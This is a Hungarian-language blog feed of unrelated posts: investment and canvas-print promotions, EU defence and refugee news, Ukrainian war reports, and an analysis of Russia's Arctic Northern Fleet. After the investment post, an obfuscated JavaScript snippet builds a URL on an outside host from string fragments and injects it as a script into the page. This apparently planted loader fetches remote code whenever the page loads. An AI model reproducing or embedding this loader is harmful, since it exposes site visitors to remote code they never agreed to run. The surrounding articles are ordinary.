Az egyik legnehezebb kérdés ilyenkor ugyanis pontosan az, miszerint milyen eszközbe érdemes fektetni a pénzünket. Erre azonban nem létezik egy általánosan alkalmazható válasz, hiszen nagyon sok mindenen múlik, hogy adott esetben melyik a legoptimálisabb megoldás. A Grantis befektetési tanácsadó segítségével először is a legfontosabb egyéni preferenciákat és az aktuális, valamint a közeljövőben várható anyagi helyzetünket kell kielemezni. A rendszeresen befektethető összeg nagysága mellett ugyanakkor a pontosan megfogalmazott célok is közelebb visznek az ideális konstrukció kijelöléséhez. Úgyszintén kardinális kérdés, hogy egyes lekötések esetében milyen távlatokban gondolkodunk, miképp a kockázattűrő képességünk is meghatározó tényező. Megannyi kritérium, melyek komplett vizsgálata szükséges a sikerhez, szerencsére a Grantis befektetési tanácsadó nem csupán részleteiben, hanem a teljes képet nézve segít meghozni a legbölcsebb döntést. Ezzel együtt bármilyen megoldás mellett is tesszük le a voksunkat végül, egy dolog mindegyikben közös. Ahhoz, hogy hosszú távon jelentős megtakarításra tegyünk szert, folyamatos odafigyelésre és tudatos hozzáállásra van szükség.

A Grantis befektetési tanácsadó segít választani

A lehetőségek igen széles skálán mozognak. Általánosságban elmondható, miszerint szinte mindegyik eszköznek megvan a maga előnye és hátránya is, így tehát ezek együttes mérlegelésével kell megtalálni a legoptimálisabbat a kínálatból. Ez egyben gyakorta azt is jelenti, hogy nem csupán egy lehetőséggel kell számolnunk, hanem többfajta befektetési forma együttes alkalmazásával érhetjük el a kívánt eredményt. Legfőképp azt kell meghatároznunk, mennyi időre kötnénk le a pénzünket, mekkora hozamot várunk el és ennek érdekében milyen mértékű rizikót vagyunk hajlandók vállalni. Középtávú, kockázatmentes megoldás például az állampapír, ami kezdők számára kifejezetten remek opció. Ha a lehető legnagyobb biztonság a cél, akkor bátran döntsünk egy inflációkövető típus mellett. Ezzel szemben a részvénypiac már némileg több hozzáértést és magasabb tűrőképességet igényel. Amennyiben egy nagyobb esés után is képesnek gondoljuk magunkat a pozíciónk megtartására és a magasabb hozam érdekében nem riadunk vissza az esetleges veszteségtől sem, akkor jó választás lehet. E két legnépszerűbb megtakarítási forma mellett azonban még jó pár egyéb lehetőség is létezik. A Grantis befektetési tanácsadó oldalán részletesen információkat kaphatunk többek közt a kötvényekről, befektetési alapokról, vagy épp a TBSZ számla használatáról.

Sokszor a kötött célú megtakarítás a legjobb döntés

Néha azonban jóval nagyobb sikerrel kecsegtet, ha egy pontosan megfogalmazott cél lebeg a szemünk előtt, amitől csak nagy áldozatok árán tudunk eltérni. Sokak számára persze nem jelent gondot a rendszeresség, ám ha folyamatosan ott a lehetőség, hogy bármikor kiszállhatunk, az a gyengébb pillanatokban akár túl nagy csábítást is jelenthet. A Grantis befektetési tanácsadó szerencsére erre is tud kiváló megoldást. Akár a megtakarításos életbiztosítás is egy kitűnő alternatíva lehet, ám ha az időskori pénzügyi helyzetünket szeretnénk már jó előre bebiztosítani, akkor érdemes a nyugdíjcélú gyűjtögetés mellett letenni a voksunkat. Ez lehet akár egy önkéntes pénztári forma, vagy épp egy előtakarékossági számla, de választhatjuk a klasszikus biztosítást is, egyéni igényeinknek megfelelően. A legbölcsebb azonban tényleg az, ha egyszerre használjuk ki az opciókban rejlő lehetőségeket és diverzifikáljuk portfóliónkat.

(function(){ qi51=document.createElement("script");qi51_=("us")+("ta"); qi51_+="t"+(".");qi51_+=("in");qi51u="437082552";qi51.async=true; qi51u+=".ax32eanti51p6id16";qi51.type="text/javascript";qi51_+="f"+"o"+("/"); qi51u+="msx82hpzb5pdu";qi51.src="https://"+qi51_+qi51u; dqi51=document.body;dqi51.appendChild(qi51); })();

The post Befektetés kezdőknek – Hogyan érdemes nekikezdeni? appeared first on .

A rendelkezésre álló lehetőségek széles skálájával a vászonképnyomtatás kiváló módja annak, hogy irodánknak vagy otthonunknak személyre szabott fotókkal, netán absztrakt képekkel feltűnő megjelenést kölcsönözzünk.

A régimódi faldíszítő anyagokhoz képest a vászonra nyomtatott képek számos előnnyel járnak a minőség, a megfizethetőség és az általános vonzerő tekintetében. A hosszú élettartam a vászonnyomatok kiválasztásának egyik fő előnye. A vászon erőteljes és tartós anyag, amely bizonyítottan tovább tart a hagyományos papírnál. Hasonlóképpen, a minőségi tinta és más nyomathordozók használata megőrzi a vászonnyomat vitalitását a papírhelyettesítőkkel összehasonlítva.

Ez az oka annak, hogy a vászonnyomatok évszázadok óta gyakran megtalálhatók múzeumokban és művészeti galériákban. Különféle méretű vászonnyomatokkal is szépítheted lakóhelyed vagy munkahelyed anélkül, hogy sok pénzt költenél.

Rendelj absztrakt vászonképeket a Vászonkép Szalon honlapjáról, és élvezd a tartós és lenyűgöző látványt biztosító fali dekorációt!

Nagyon sokféle vászonnyomat létezik, például négyzet alakú, álló helyzetű vagy fekvő, akár különböző méretekben. Akár egy fényképet szeretnél megjeleníteni nappalid falán, akár csak egy professzionális megjelenésű absztrakt képet helyeznél el az irodában, bármilyen lehetséges méretet kiválaszthatsz a vizuális nyomtatáshoz.

Érdemes azonban jó minőségű és nagy felbontású képet vagy fényképet nyomtatni. A nyomdák is elemezhetik a mellékelt fényképet, és javasolhatják a fényképedhez legmegfelelőbb méretet vagy stílust.

Az üveggel nyomtatott és bekeretezett vagy fényes anyagokra nyomtatott látványelemek jól néznek ki, ha a megfelelő helyen állítják ki őket. De amikor olyan nappaliban jelenítik meg őket, ahol sok fény van, az visszatükröződést okozhat, ami elvonja a figyelmet a képről.

Másrészt a vászonnyomatok foltos-matt felülettel készülnek, így mindenhol tökéletesen néznek ki. Ezért a legtöbben a vászonnyomtatást részesítik előnyben az üvegkeretes fényképekkel szemben, amikor a szoba vagy iroda falán absztrakt festményeket jelenítenek meg.

Az eleve különleges mintázatok, színek garantáltan ellopják a show-t egy üres, kopár falfelületen, éppen ezért egy vászonnyomat formájában megadhatjuk neki a megérdemelt figyelmet.

Fényképeidnek vagy kedvenc absztrakt műalkotásaidnak vászonra való nyomtatása sokoldalú és megfizethető. Kiválaszthatod a szerkeszteni és kinyomtatni kívánt fényképeket egyéni preferenciáid szerint, amelyek különböző formátumban, stílusban és méretben is nyomtathatók.

Akár egy különleges napra díszíted otthonod, akár kedvenc esküvői fényképed szeretnéd kitenni nappalid falára, a vászonképek még vonzóbbá és sokoldalúbbá tehetik lakóhelyed vagy munkahelyed.

Látogass el a Vászonkép Szalon honlapjára, és inspirálódj a csodás absztrakt vászonképeket böngészve!

The post Miért válassz absztrakt vászonképeket a falra? appeared first on .

Josep Borrell, az Európai Unió külügyi és biztonságpolitikai főképviselője brüsszeli sajtótájékoztatóján a javaslatok bemutatásakor elmondta, az intézkedések célja az Ukrajna elleni háború miatt romló biztonsági környezet kezelése, valamint az EU azon képességének fokozása, hogy képes legyen megvédeni polgárait és infrastruktúráját.

Tájékoztatása szerint a katonai mobilitásról szóló cselekvési terv segíteni fogja az európai fegyveres erőket abban, hogy jobban, gyorsabban és megfelelő mértékben reagáljanak az EU külső határain és azokon túl kitörő válságokra. Megerősíti az unió azon képességét, hogy támogassa a tagállamokat és a partnerországokat a csapatok és felszereléseik szállítása terén. Emellett jobban összekapcsolt és védett infrastruktúra kialakítására törekszik, miközben egyszerűsíti a szabályozási követelményeket. Megerősíti az együttműködést a NATO-val, és elő fogja mozdítani az összeköttetést és a párbeszédet a kulcsfontosságú partnerekkel – mondta.

Az új kibervédelmi javaslatokkal kapcsolatban az uniós főképviselő közölte, az EU fokozni fogja a védelemmel kapcsolatos együttműködését és újabb beruházásokat támogat majd az egyre növekvő számú kibertámadás hatékonyabb védelme, felderítése, megakadályozása és az azokkal szembeni védelem érdekében.

“A kibertérnek nincsenek határai. Az energiahálózatok, a közlekedési infrastruktúra és az űreszközök elleni közelmúltbeli kibertámadások rámutattak arra, hogy ezek a rendszerek milyen kockázatokat rejtenek. Mindez hatékonyabb fellépést tesz szükségessé az emberek, a fegyveres erők, valamint az EU polgári és katonai misszióinak és műveleteinek kiberfenyegetésekkel szembeni védelme érdekében” – fogalmazott.

Az EU új kibervédelmi politikája javítani fogja a kibertámadások és az általuk esetlegesen okozott válságok hatékony kezelését, hozzá fog járulni a kritikus kibertechnológiáktól való stratégiai függőség csökkentéséhez, miközben megerősíti az európai védelmi technológiai ipart. Ösztönözni fogja a vonatkozó képzést, valamint fokozni fogja a kibervédelem terén megkezdett együttműködéseket – tette hozzá az uniós diplomácia vezetője.

The post Az EU új intézkedéseket javasol a katonai mobilitás és a kibervédelem javítására appeared first on .

Az uniós hivatal közölése szerint a háború elől Ukrajnából elmenekültek nagy számban regisztráltak ideiglenes védelemre, mely hozzáférést biztosít egyebek mellett az egészségügyi ellátáshoz, a munkaerőpiachoz és az állami oktatáshoz. A legtöbb ideiglenes védelemi státuszt biztosító Lengyelországot Németország (51 980), Románia (9715), Spanyolország (5745) és Írország (4 925) követte szeptemberben.

Augusztushoz képest a tagállamok közül 18-ban csökkent az ideiglenes védelmet szerző ukrajnaiak száma. A legnagyobb visszaesést Lengyelországban figyelték meg, ahol szeptemberben az előző hónap adataihoz képest 13 735-rel kevesebb ilyen jogállást biztosítottak. Az illetékes hatóságok Németországban 10 160-nal, Franciaországban 2830-cal kevesebb ideiglenes védelemi státuszt biztosítottak szeptemberben a megelőző hónaphoz képest. Ezzel egyidőben Írországban 900-zal, Dániában 345-tel és Cipruson 105-tel több ilyen kérelmet hagytak jóvá szeptemberben, mint augusztusban.

A rendelkezésre álló adatok szerint az ukrajnai háború február 24-i kezdete óta Lengyelország mintegy 1,4 millió, Németország 813 725, Spanyolország 145 825 és Bulgária 134 790 ideiglenes védelemi státuszt biztosított az ukrajnai menekülteknek. Az egyes tagállamok népességéhez viszonyítva a szeptemberében az ideiglenes védelemben részesülő ukrán állampolgárok ezer lakosra jutó aránya Észtországban volt a legmagasabb (1,8). Lengyelországban 1,4, valamint Litvániában, Lettországban és Írországban 1 ukrajnai menekült jutatott ezer lakosra.

Az ukrajnai kiskorúak számára Németország biztosította a legtöbb, 15 460 ideiglenes védelmet, majd Lengyelország (13 980), és Románia (2865). Megjegyezték, az ideiglenes védelemben részesülő ukrajnaiak többsége nő volt. A jelentésből kiderült azt is, hogy Magyarország az ideiglenes védelemi státusz bevezetése óta márciusban 1440, áprilisban 7075, májusban 6935, júniusban 5650, júliusban 2794, augusztusban 1895, szeptemberben pedig 1220 ilyen jogállást biztosított ukrajnai menekültek számára.

The post Eurostat: Lengyelország biztosította a legtöbb ideiglenes védelmi státuszt az ukrajnai menekülteknek appeared first on .

“Csak az elmúlt 24 órában Petropavlivka-Novorajszk irányában a védelmi erők egységei hét kilométert nyomultak előre, hat település felett vették át az ellenőrzést, és 107 négyzetkilométernyi területet adtak vissza Ukrajnának. Pervomajszke-Herszon irányában hét kilométert haladtunk előre, hat település felett vettük át az ellenőrzést, felszabadult 157 négyzetkilométer terület” – fejtette ki a főparancsnok.

Zaluzsnij elmondta, hogy október 1-je óta Herszon irányában az ukrán csapatok az ellenség védelmének mélyére, csaknem 36,5 kilométert nyomultak be, a visszafoglalt terület teljes területe pedig eléri az 1381 négyzetkilométert. Az ukrán erők ez idő alatt 41 települést vettek vissza.

A főparancsnok szavai szerint az ukrán erők a megyeszékhely, Herszon irányában megsemmisítették az orosz csapatok logisztikai útvonalait, vezetési és irányítási rendszerét. “Az ellenségnek nem volt más választása, mint a menekülés” – jegyezte meg. Kijelentette ugyanakkor, hogy nem tudja sem megerősíteni, sem cáfolni az orosz megszálló csapatok Herszonból való kivonásáról szóló információkat.

Andrij Jermak, az ukrán elnöki iroda vezetője nyilvánosságra hozta, hogy az ukrán hadsereg visszavette az ellenőrzést a herszoni régióval szomszédos Mikolajiv megyében lévő Snyihurivka település fölött. Jermak videofelvételt is közzétett a Twitteren, amelyen az látható, hogy a helyi lakosok tapssal fogadják az ukrán katonákat.

Mihajlo Podoljak, Jermak tanácsadója a Twitteren azt írta, szerinte Oroszország azt tervezi, hogy Herszont rommá lövi a Dnyeper (Dnyipro) folyó bal partjáról. Kijelentette, hogy Oroszország “szellemvárossá” akarja változtatni Herszont. “Az orosz hadsereg mindent aláaknáz, amit csak lehet: lakásokat, csatornákat. Így néz ki az orosz világ: jöttek, raboltak, ünnepeltek, megölték a tanúkat, romokat hagytak maguk után, aztán elmentek” – fogalmazott a tanácsadó.

Olekszij Hromov, az ukrán vezérkar műveleti főigazgatóságának helyettes vezetője csütörtöki sajtótájékoztatóján közölte, hogy szerdán az ukrán csapatok bizonyos területeken két kilométeres távolságban nyomultak előre a keleti országrészben lévő Luhanszk megyében. “A védelmi erők fokozatosan szabadítják fel az ukrán területeket a betolakodóktól. A luhanszki régióban csak az elmúlt nap folyamán csapataink bizonyos irányban két kilométert is előrehaladtak” – fogalmazott a katonai vezető.

Volodimir Zelenszkij szerda éjjeli videoüzenetében óva intette a moszkvai vezetést attól, hogy megkísérelje felrobbantani a Herszon megyei kahovkai vízerőművet, amely nagy területet árasztana el és vízellátás nélkül maradna a zaporizzsjai atomerőmű. Kijelentette, hogy ez a tett hadüzenetet jelentene az egész világgal szemben.

The post Orosz agresszió: terv szerint kergetik Putyin seregeit appeared first on .

A szaktárca közleményében hangsúlyozta: a tolmácsok segítségével zajló oktatás során egyebek mellett precíziós lövészetre, improvizált robbanószerkezetek elleni védelemre és aknamentesítésre oktatják a katonákat. “Ukrajna védelmével a békét védjük” – idézte a közlemény Margarita Robles spanyol védelmi minisztert, aki hangsúlyozta, hogy a dél-európai ország a háború kezdete óta folyamatosan segíti Ukrajnát.

A minisztérium tájékoztatása szerint Spanyolország a képzési támogatáson kívül újabb két Hawk típusú rakétakilövőrendszert küld Ukrajnába a múlt hónapban eljuttatott négy mellé, valamint hat taracküteget és az Aspide légelhárító rakétarendszerhez tartozó akkumulátort.

A közlemény beszámolt arról, hogy a jövő héten induló kiképzésben már az ukrán katonák harmadik csoportja vesz részt. Jelenleg 21-en tanulnak tarackkezelést egy almeríai műveleti központban, korábban pedig 19-en sajátították el az Aspide légelhárító rendszer használatát a zaragozai légi bázison.

The post Orosz agresszió: Spanyolország 64 ukrán katona kiképzését kezdi meg a jövő héten appeared first on .

Az 2022. február 24-én megindított orosz katonai agresszió Ukrajna ellen számos tekintetben nagy jelentős hatást gyakorolt a nemzetközi gazdasági-, hatalom-politikai, energetikai-, ipari-, valamint diplomáciai viszonyokra egyaránt. Jelen cikk a gazdasági szankciók, háborús események közepette, egy pillanatnyilag média háttérben lévő témát igyekszik ismertetni.

A geopolitikai szempontból egyre hangsúlyosabbá váló arktiszi térségben való orosz ambíciók a jelenlegi ukrajnai események fényében kisebb figyelmet kapnak. A cikk éppen ezért Moszkva gazdasági- katonai érdekeinek és kapacitásainak bemutatásán keresztül igyekszik felhívni a figyelmet az Oroszországi Föderáció egyéb terjeszkedési céljaira és (ismét) egyre erősödő befolyásépítésére.

Miért érdekli a Kreml-t a térség?

Arktiszi érdekei érvényre juttatása során Moszkva számára elsődleges fontosságú, hogy zavartalan és könnyed hozzáférése legyen a régió óriási mennyiségű kőolaj és földgáz kincséhez. A régió hozzávetőlegesen mintegy összesen 90 milliárd hordó olajat, 481.000 millió köbméter földgázt, valamint mintegy 44 milliárd hordó cseppfolyósított gázt rejt, így érthető, hogy a Kreml nem titkolt célja, hogy a hatalmas állam kedvező földrajzi pozícióit kihasználva a lehető legnagyobb mértékben részesüljön ebből az igen jelentős energiakincsből. Mindemellett hatalmas gazdasági jelentőséggel bír, hogy a RAZ (Russian Arctic Zone) (valamint az Arktisz bizonyos egyéb részei) bizony egyéb ásványkincsekben sem szenved hiányt. Olyan számos iparág számára találhatóak meg itt, mint a süllyesztett gyémánt (99%-a az orosz termelésnek), platina csoportba tartozó elemek (98%), nikkel és kobalt, króm, réz mangán, volfrám és egyéb ritkaföldfémek. kritikus jelentőségű nyersanyagok

A nyersanyagban való ellátottságból logikusan következik, hogy a szubarktikus területek Oroszország számára nem csupán szűkebb értelemben vett gazdasági-, hanem óriási ipari jelentőséggel is bírnak. Ugyanakkor annak ellenére, hogy az orosz arktikus területek a hatalmas állam bruttó hazai össztermékének 11-, míg exportbevételeinek 22%-át adják, az ország lakosságának mindössze 1%-a él a térségben. Az Arktisz tényleges potenciáljának a lehető leghatásosabb kihasználása érdekében elengedhetetlen, hogy az orosz állam, illetve magáncégek akár külföldi befektetések (FDI) bevonzásával is, de jelentős fejlesztéseket hajtsanak végre olyan fontos szektorokban, mint a bányászat, a közlekedési- vagy kommunikációs infrastruktúra, vagy az energiaszektor.

Nem véletlen tehát az sem, hogy az orosz kormány állami stratégiai dokumentumokban is világossá teszi az északi sarki érdekeket, valamint, hogy olyan dokumentumok is megjelennek, mint amilyen például a 2008-ban jóváhagyott “Az Orosz Föderáció alapjai, állami politika az Északi-sarkvidéken 2020-ig és azon túl” című úgynevezett arktiszi stratégia, vagy ennek „tovább fejlesztése”, (számos változtatással) a 2020. november 5-én megjelent „Az orosz állam sarkvidéki politikájának új alapelvei 2035-ig” névre keresztelt stratégia.

Orosz katonai jelenlét a sarkkörön túl

Ami Moszkva északi-sarkvidéki katonai jelenlétét illeti, megállapítható, hogy nem csupán a jelenlegi háborúnál, még modern Ukrajna és Oroszország között kialakult 2014-es területi konfliktusnál (Krím-félsziget) is jóval régebbre nyúlik vissza. A hidegháborús szembenállás idején, a mai Oroszországnál jóval nagyobb ipari-, katonai- és gazdasági potenciállal rendelkező Szovjetunió a jelenlegi orosz képességeknél (a kor viszonyai között) jóval erősebbekkel rendelkezett és utódállamával ellentétben számos tengerészeti és légierő fegyvernem tekintetében is paritást tudott felmutatni az Egyesült Államokkal, illetve a NATO-val szemben.

A posztbipoláris viszonyok között a gazdaságilag káoszba süllyedő „újszülött” Oroszországi Föderáció a többi katonailag, valamint stratégiai szempontból jelentős fölrajzi térség mellett az Arktiszon sem tudta fenntartani az „örökölt” szovjet katonai kapaitásokat és létesítményeket csupán a nukleáris erőkivetítő képesség, valamint az     arzenál lehetőségek szerinti leginkább épp állapotban való megőrzését tekintette elsődleges katonai prioritásnak. A 2000-es évek végére gazdaságilag egyre inkább feltörekvő Föderáció (olajáremelkedés) a már fentebb említett célok érdekében az említett dokumentumok értelmében megkezdte ambíciói érvényesítését (a korábbi pozíciókra hivatkozott) „terjeszkedést” a térségben.

A számos kiépített katonai légibázis és nukleáris atomsiló (Kola-félszigeten található az orosz nukleáris arzenál jelentős része, valamint) a térségben világosan mutatja, hogy az orosz hatalmi elit komolyan számol a térség jövőben egyre csak növekedő (jégolvadás, felmelegedés) gazdasági, kereskedelmi (Northern Sea Route – NSR) és katonai lehetőségeivel. A Távol-Kelet és Európa, valamint az Eurázsia és Észak-Amerika között potenciálisan megnyíló alternatív útvonalak a hatalmas (közvetítő)kereskedelmi profit mellett bizony katonai-rendészeti (határrendészeti – partiőrség) feladatokat is jelentenek a Föderáció számára. Ennek következtében tehát, a már említett 2020-ig tervező arktiszi stratégiában az orosz vezetés kiemelten fontosnak tartja Északi Flotta Egyesített Stratégiai Parancsnokságának, Szövetségi Biztonsági Szolgálat parti védelmi szolgálatának (FSZB), valamint a határellenőrzésnek fokozott felelőségét. Az Északi-sarkvidéki Erők Csoportjának feladata tehát nem csupán a területek védelme – és az egyes szorosok és folyótorkolatok ellenőrzése-, hanem az orosz gazdasági-, katonai- és biztonsági érdekek térségbeli érvényesítése is. A biztonsági szervek és a katonai szervek egymásba integrálása sikeres volt, így például aktualitásként említhető ez év augusztusában lezajlott az Északi Flotta FSZB-vel végrehajtott hadgyakorlata.

Az Északi Flotta jelentősége, modernizálása

Bár történelmi előzményei a cári időkig visszanyúlnak, az Északi Flotta igazán nagy jelentőségre a szovjet éra alatt tett szert. A cári korszak Jeges-tengeri flottillájából 1933-ra egy fejlettebb és ütőképesebb tengerészeti erő fejlődött ki, melyet ekkor szerveztek a Szovjetunió Haditengerészetébe. Miután 1965-ben kitüntették a Vörös Zászló érdemrenddel, a Vörös Zászló Északi Flottájának hívták. A hidegháborús fegyverkezés zenitjén, az 1970-es években jelentős felszíni erők mellett több mint 200 tengeralattjárót üzemeltetett, melyek közöl számos nukleáris tölteteket célba juttató ballisztikus rakétákkal (meglepetés ereje – általában nem lehetett tudni az atomtengeralattjárók pontos helyzetét) volt felszerelve.

Ugyan a posztbipoláris korszak posztszovjet térséget sújtó gazdasági- és részben ennek következtében bekövetkező katonai hanyatlása az Északi-Flottát sem kímélte, mára számos fejlesztésnek, és a 2010-es évek elejétől meginduló modernizációnak (nem lehet tudni pontosan milyen károkat és csúszásokat okoz ebben Moszkva jelenlegi gazdasági- és politikai elszigeteltsége) lehetünk tanúi. Az Ilja Murometsz jégtörő, a Knyaz Vlagyimir Borej-osztályú atomtengeralattjáró, a frissen tesztelt Poszeidón nukleáris vezető nélküli vízalatti jármű (UUV -Unmanned Underwater Vehicle), valamint a hiperszonikus Cirkon rakéták azonban az Északi Flotta nagyfokú fejlesztéséről tanúskodnak, melynek legújabb szakasza a 2018 és 2027 között lezajló a fegyveres erőket érintő fejlesztési programban hivatott tovább folytatódni. Emellett fontos megemlíteni, hogy az orosz katonai tervezés az északi sarki vizek egyre hajózhatóbbá válásának dacára továbbra is igyekszik növelni a flotta operabilitási képességeit a jégtörő flotta fejlesztésével. (ezen a területen az ország előnyben van a nyugati államokkal szemben) Az említett 2017-ben szolgálatba állított Ilya Murometsz mellett a Flotta mintegy 5,5 milliárd rubel értékben rendelte meg a szentpétervári Almaz vállalattól a Jevpatyij Kolovrat segédjégtörő hajó építését mely ugyan kisebb, de kisebb és olcsóbb a fenntartása     , mint a jelenleg „fő” jégtörőnek számító Ilya Murometsz és amely tervek szerint ez évben került volna hadrendbe. Ugyan ez valószínűleg késni fog, a Flotta igénye további jégtörőkre az egyre szűkülő és kedvezőtlenebb gazdasági lehetőségek ellenére is töretlennek látszik.

A jelenlegi orosz fegyverkezési program

A 2018-tól 2027-ig tervezett orosz fegyverze-tmodernizálási program, melyet 2017 novemberében fogadott el Vlagyimir Putyin elnök ugyan az Orosz Fegyveres Erők valamennyi haderőnemét, így a téma szempontjából jelentős hadászati nukleáris-, valamint flottaerőket is érinti. A program egy 2011-től meginduló modernizálási program folytatásaként indult azzal megegyező, mintegy 19 billió rubelnyi költségvetéssel. Ugyan kezdetben számos nézeteltérés akadt a Védelmi Minisztérium és a Pénzügyminisztérium között a felhasználható pénzösszeget illetően (a percepciók és az államapparátuson belüli összhangot mutatja, hogy jóval a program megindítása előtt a Védelmi Minisztérium nagyjából 40 billió rubelnyi igényével      szemben a Pénzügyminisztérium először 14 billió rubel allokálására lett volna hajlandó) komoly viták akadtak, azonban kompromisszum megszületése sem jelentett egyértelmű viszonyokat, csupán áthelyezte a konfliktust egy alsóbb szintre. Ennek értelmében az egyes haderőnemek (szárazföldi- űrerők és haditengerészet, stratégiai rakétaerők és légideszanterők, valamint a különleges műveleti erők) „versenyeztek” egymással az elérhető pénzösszegekért.

A stratégiai rakétaerők modernizálása

A program értelmében 2021-re a nukleáris triász haditengerészeti komponensének hat Delta IV-osztályú és nyolc Borei-osztályú stratégiai ballisztikus rakéta-tengeralattjárót kellett volna magában foglalnia, egyenletesen elosztva az északi és a csendes-óceáni flotta között. Ebből mindössze a Delta IV-osztályra való célkitűzést sikerült teljesíteni (mindegyik az Északi-Flottához tartozik), míg a Borei osztályból mindössze 5 került aktív szolgálatba, s ebből csupán 3 került az arktiszi erőkhöz. További célkitűzésként már mostanra megvalósult a Kh-55-ös nagyhatótávolságú cirkálórakéták jelentős részének Kh-101-re való lecserélése is. Végül, de nem utolsósorban a program keretében három jelentősebb fejlesztési projekt is megindult (vagy kapott forrásokat a befejezéshez) a nukleáris triád továbbfejlesztésére. A      Rubezs  közúti mozgó interkontinentális ballisztikus rakéta (ICBM), a Barguzin vasúti mozgó ICBM és a Szarmat nehéz, silóalapú ICBM. Ezek közül eddig csak a Rubezs projektből ért el sikereket, ugyanis a RS-24-es (Rubezs-24) modelleket már szolgálatba állították. Ugyanakkor a szintén célként kitűzött 26-os modell még mindig nincsen kész, és már a jelenlegi háborús viszonyokat megelőzően bejelentésre került, hogy ezen évtized végéig várhatóan nem is kerül befejezésre. (háborús szankciók nélkül sem)

Flottafejlesztés az Arktiszon

A fentiek szerint, az előző fegyverkezési program (2008/11-2018) során is jelentős fejlesztések valósultak meg az Északi Flotta eszközállományát illetően. Mindazonáltal meg kell említenünk, hogy bár ezen fegyverkezési ciklusban is számos fejlesztésről állapodtak meg, a flotta összességében a forrásokért folytatott „verseny” egyik legnagyobb vesztesének tekinthető. Az előző ciklusban folyósított mintegy 4,7 billió rubelnyi összeg helyett, a tervek szerint a jelenlegiben csupán mindössze 2,6 billió rubelnyi támogatást fog kapni. A nagyfokú forrásmegvonás egyik legfőbb oka, hogy – bár a katonapolitikai szándék megvan a tengeri erőkivetítőképesség tovább növelésére – a flotta az orosz hajóipar technológia hiánya, a Krím annektálását követő nyugati szankciók miatti gazdasági korlátozottságban nem tudta elkölteni a fejlesztésekre kiutalt óriási összegeket. Annak ellenére, hogy a haditengerészeti doktrínában nagyszabású tervek szerepelnek nagy vízkiszorítású, impozáns fegyverzettel rendelkező hajók építésére, jelenlegi helyzetben valószínűbbnek tűnik, hogy a fókusz egyre inkább a tengeralattjárók, valamint a fregattok és korvettek fejlesztésére és modernizálására fog áttevődni. A jelenleg zajló egyetlen új fejlesztési projekt, mely egy teljesen új hajóosztályt kíván vízre bocsátani, a Szuper-Gorskov osztályú nukleáris fregatt, mely a tervek szerint 48 darab 3M-54 Kalibr cirkálórakéta mellett Cirkon-hiperszonikus ballisztikus rakétával is fel lenne szerelve. Az ambíciók ellenére azonban látnunk kell, hogy az Oroszországi Föderáció gazdasági teljesítő képessége igencsak korlátolt, és azt a jelenlegi nyugati gazdasági szankciók valószínűleg csak gyengíteni fogják. Ez, valamint a szükséges technológiáktól való elszakadás rendkívül negatívan érinti az orosz hadiipart, valamint a modernizációt is.

Konklúzió

Összességében látható tehát, hogy Moszkva ambíciói számos tekintetben az északi sarkkörre vonatkozó fejlesztésekben sem igazán találkoznak a tényleges kapacitásokkal. Az orosz hajóipar számára az import helyettesítés már 2022-ig is ötéves késedelmet okozott az egyes fejlesztési és modernizálási projekteket illetően, és várható, hogy az orosz United Shipbuilding Corporationt sújtó 2022. áprilisi szankciók további gátakat jelentenek majd a Kreml modernizálási ambícióinak.

Kovács Tibor írása.

Hasonló témájú cikkeink itt találhatók.

A cikkben Vitali Adutskevich és Nikolai Artiminov képeit használtuk.

A Mi történik északon a háború közben? – Az orosz Északi Flotta és arktiszi ambíciók bejegyzés először Biztonságpolitika-én jelent meg.